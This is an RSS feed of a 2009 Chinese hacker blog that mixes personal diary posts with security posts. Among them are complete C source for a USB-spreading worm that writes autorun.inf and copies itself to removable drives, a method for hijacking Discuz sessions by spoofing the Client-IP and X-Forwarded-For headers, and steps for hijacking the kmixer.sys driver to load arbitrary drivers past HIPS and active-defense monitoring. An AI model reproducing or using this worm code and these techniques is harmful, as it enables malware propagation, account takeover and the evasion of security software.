<![CDATA[wi4r's草窝]]> http://hi.baidu.com http://hi.baidu.com http://img.baidu.com/img/logo-hi.gif http://hi.baidu.com/wi4r zh-cn www.baidu.com 5 <![CDATA[换地方了_tog]]> baidu hi用着一直还挺不错的。。。

现在换到tog小组去http://www.tog.ie


类别:*茶楼 查看评论]]> 2009-10-25 21:21 http://hi.baidu.com/wi4r/blog/item/edace3a378a144a7cbefd018.html <![CDATA[石中剑安全会。]]> http://www.newcamelotcouncil.com

帮zulu推广下这次石中剑安全峰会,内容安排的很丰富

到时候去混个脸熟


类别:*茶楼 查看评论]]> 2009-10-06 15:22 http://hi.baidu.com/wi4r/blog/item/8993e73e8083e5c87d1e7159.html <![CDATA[开学了!让人感动和心酸的一幕幕]]> http://v.youku.com/v_show/id_XNDAyMTc4ODQ=.html(视频地址)

十年寒窗,高考一战啊,想想自己十年来的奋斗、努力、汗水、艰辛,如今步入大学的大门是多么的不容易啊,想想在备考的时候,自己的爸爸妈妈不畏辛苦,陪伴自己的孩子复习功课,调整心态,父母的这份(爱)是多么的伟大,如今进大学了,父母还是依旧放心不下我们,宁愿丢下自己的手上的工作,都要把我们亲自送进大学的门! 愿全天下的学子在新的大学里面学业有成!

       儿行千里,母担忧啊

阅读全文
类别:*茶楼 查看评论]]> 2009-08-31 22:15 http://hi.baidu.com/wi4r/blog/item/cd5ee589b5b4619da4c272d5.html <![CDATA[闷沉的夏季]]> 好久没上来发牢骚了,这段时间工作都快疯掉了

好不容易上个星期六出去几个朋友吃个饭吧,人家都以为咱们是山卡卡出来的,

走在大街上,看美女都花枝招展的,男的个个大帅哥,俺呢?

近来发现自己越来越远离人际圈了,身边的女孩都说我跟她们有代沟,其实大家都是同龄人.

这几天深受打击阿,广东这地方可能真不适合咱们呆

很想回家,广东这地方在也没值得留念的东西了


类别:*茶楼 查看评论]]> 2009-08-11 14:58 http://hi.baidu.com/wi4r/blog/item/661a123ef42fd1e554e72323.html <![CDATA[DISCUZ所有版本COOKIE劫持方法+DEMO]]> DISCUZ和很多论坛都无法进行会话劫持,因为会话和IP绑定了,DISCUZ主要的会话认证机制如下:

/inlude/common.inc.php
//第136行 验证会话重要的一段就是从sessions表中查询SID,其中一个重要的条件就是$onlineip,如果$onlineip和sessions表中的IP信息无法对应,就不能继续建立sessions表中保存的会话。
——————————————————————————–


代码:
if($sid) {
if($discuz_uid) {
$query = $db->query("SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, s.pageviews AS spageviews, s.lastolupdate, s.seccode, $membertablefields
FROM {$tablepre}sessions s, {$tablepre}members m
WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid'
AND m.password='$discuz_pw' AND m.secques='$discuz_secques'");

//79行 $onlineip首先取自HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头
------------------------------------------------------------------------------
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], ‘unknown’)) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}

所以如果我们伪造HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头就可以绕过IP绑定。
阅读全文
类别:*安全预警 查看评论]]> 2009-07-28 11:26 http://hi.baidu.com/wi4r/blog/item/9cd5f0fc3ad1ec4cd6887d9c.html <![CDATA[恭喜dm]]> 今天午饭后听湿人风说DM兄,当爸爸了,结果跑去BLOG一看.

先恭喜DM吖,小DM出世了..

祝福这小DM往后又一黑客


类别:*茶楼 查看评论]]> 2009-07-17 16:58 http://hi.baidu.com/wi4r/blog/item/cff445c702cb91129d163d2e.html <![CDATA[安全不小心掉进洞里了]]>                                                                        

←漏洞→

[不知道什么洞]

好奇心也是洞

这是个到处都是洞的时代,

这是最好的时代,也是最坏的时代
这是智慧的时代,也是愚蠢的时代
这是置信的时代,也是疑虑的时代
这是光明的季节,也是黑暗的季节
这是希望的春天,也是绝望的冬天
我们什么都有,也什么都没有
我们都会上天坛,也全部会下地狱

------让统计数值说话-------

        1997年
       40个漏洞

        2006年
      21,400个漏洞
    
      1997-2006年
    漏洞成长了535倍

        1997年
   17,000个病毒\木马

        2006年
   222,000个病毒\木马

       1997-2006
病毒与木马成长了13倍

        2000年
     43.6%远端漏洞

        2007年
     89.4%远端漏洞
       
         2007年
   漏洞多与浏览器有关

         2008年
   浏览器漏洞为239个

         2008年
      58%与web有关
        
          2008年
    11,253 个xss漏洞
   xss较上半年成长近2倍

后续更新中........

阅读全文
类别:*八卦 查看评论]]> 2009-07-12 20:38 http://hi.baidu.com/wi4r/blog/item/8d003df5e67efd67ddc474b5.html <![CDATA[夏季的选择]]> 这个平凡而又炎热的夏天,发生很多事情,得到了很多,也失去了很多,有过甜,有苦过

想想回来都大半年了,感觉自己还没完全的去适应社会,自己总是徘徊在三岔路口

这个炎热,闷热的夏天让我想起了,在训练的夏天,在那段日子里面,摔倒了再爬起来,哭了擦干眼泪,重新来过

一个动作练不好,练两遍,两遍不行,三遍.总是把自己折腾的遍体鳞伤的,

身边的好朋友都各奔自己的前程去了,走的走,散的散,现在留下我一个了

这个星期过后,她就要离开广东,回到曾经她起飞的地方了,她叫我去走的那一天去送她

记住她给我的鼓励,关心,疼爱!

在技术圈子,摸爬滚打这几年,学到很多东西,我感谢我那两位恩师(莫大,冷面)

当然还有:狐狸 ,小猫,周老大,小强,菊花侠,诺诺,coldeye,胖子,RB,仟仟,虎子等等!

希望我的朋友们,每天开开心心的,技术越来越牛,你们永远是我南瓜的朋友

如今,我终于找到了自己喜欢做的事,自己要走的路了.

阅读全文
类别:*茶楼 查看评论]]> 2009-07-03 20:09 http://hi.baidu.com/wi4r/blog/item/cff445c76a10f9129c163d41.html <![CDATA[感染USB代码]]> #include <windows.h>
#include <stdio.h>

int InfectDrives( );
int WriteINI( char* sINI, char* sFILE );
int ReadINI( char* sINI, char* sFILE );
int FileCopy( char* sNEW );

char* szFileName = "blah.exe";

int main()
{
    int i = InfectDrives( );
   
    printf( "drives infected: %i", i );
   
    getchar( );
   
    return 0;
   
};

int InfectDrives( )
{
    char szBuffer[260];
    char szInit[520], szFile[520];
    int iCount = 0, iGet, iType;
   
    iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer );
    if( iGet == 0 ) {
        return( 0 );
    }
    char *szDrive = szBuffer;
   
    while( *szDrive )
    {
        iType = GetDriveTypeA( szDrive );

        sprintf( szInit, "%sautorun.inf", szDrive ); //craft inf
        sprintf( szFile, "%s%s", szDrive, szFileName ); //craft file
       
        if( iType == 2 ) //removable device
        {
            if( ReadINI( szInit, szFileName ) == 0 ) //check for infection
            {
                if( WriteINI( szInit, szFileName ) == 0 ) //infect
                {
                    if( FileCopy( szFile ) == 0 ) //copy file
                    {
                        iCount++;
                    }
                }
            }
        }
        szDrive = &szDrive[ strlen( szDrive ) + 1];
    }
   
    return( iCount );
};

int WriteINI( char* sINI, char* sFILE )
{
    unsigned long bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI );
    if( bWrite == 0 ) {
        return( 1 );
    }
    return( 0 );
};

int ReadINI( char* sINI, char* sFILE )
{
    char szBuffer[260];
    unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI );
    if( lRead != 0 ) {
        if( strstr( szBuffer, sFILE ) ) {
            return( 1 );
        }
    }
    return( 0 );
};

int FileCopy( char* sNEW )
{
    char szBuffer[260];
    GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) );
   
    bool bCopy = CopyFile( szBuffer, sNEW, 0 );
    if( bCopy == false ) {
        return( 1 );
    }
    return( 0 );
} 阅读全文
类别:*原创 查看评论]]> 2009-07-01 21:22 http://hi.baidu.com/wi4r/blog/item/70358a39511e7dcbd5622510.html <![CDATA[Audio Mixer劫持(爆新)]]> 作者:Azy

按照m$的说明,kmixer.sys是一个音频的混音驱动(Audio Mixer),借助于这个驱动的某些特性,通过对其劫持可以实现一种较“新”的驱动加载方式,从而穿越目前市场上一切主动防御和HIPS.

Kmixer的特性是:windows可能维护了一个计数器,从而在系统的音频设备(小喇叭)空闲时间到达某一门限时将kmixer驱动卸载,而在音频设备再次发声时通过worker thread调用PipDeviceActionWorker->…->…->IopLoadDriver再次加载驱动,由于这中间不经过Zw/NtLoadDriver,因此可以完全绕过HIPS/主防的监控(kmixer重新载入时的call stack 如下)。

WARNING: Stack unwind information not available. Following frames may be wrong.

00 f9ea6824 805a4f27 kmixer+0x28105

01 f9ea68f4 805c7366 nt!IopLoadDriver+0x66c

02 f9ea6938 80597b32 nt!PipCallDriverAddDeviceQueryRoutine+0x235

03 f9ea6984 8059827c nt!RtlpCallQueryRegistryRoutine+0x3b1

04 f9ea69e8 805ac308 nt!RtlQueryRegistryValues+0x2a6

05 f9ea6abc 805ac409 nt!PipCallDriverAddDevice+0x261

06 f9ea6d18 805a9fbe nt!PipProcessDevNodeTree+0x1a4

07 f9ea6d4c 8050a396 nt!PiProcessReenumeration+0x60

08 f9ea6d74 804e526b nt!PipDeviceActionWorker+0x166

09 f9ea6dac 8057e0f1 nt!ExpWorkerThread+0x100

0a f9ea6ddc 804f927a nt!PspSystemThreadStartup+0x34

0b 00000000 00000000 nt!KiThreadStartup+0x16

因此,配合下面的方法及步骤,通过对AM进行劫持可以实现驱动的加载:

1.       修改kmixer服务键的ImagePath为欲加载bin路径

2.       更改windows目录下的media文件夹名,使系统处于“哑”状态,等待系统卸载kmixer

3.       卸载成功后,将media文件名改回

4.       触发一个音频设备发声操作(测试时可使用:拖动喇叭音量条,双击文件夹,点击返回、向上箭头等等,总之一些windows自定义的音频操作即可)

5.       最终触发系统再次加载kmixer.sys,但此时已被我们劫持

注意:这是一种较为被动的攻击方式,原因在于如果之前OS已加载kmixer,那么可能由于无法人为干预卸载过程,需要等待系统来卸载,而后再触发音频设备发声使kmixer加载。

阅读全文
类别:*八卦 查看评论]]> 2009-06-25 09:21 http://hi.baidu.com/wi4r/blog/item/554e8018bfef974c43a9ad35.html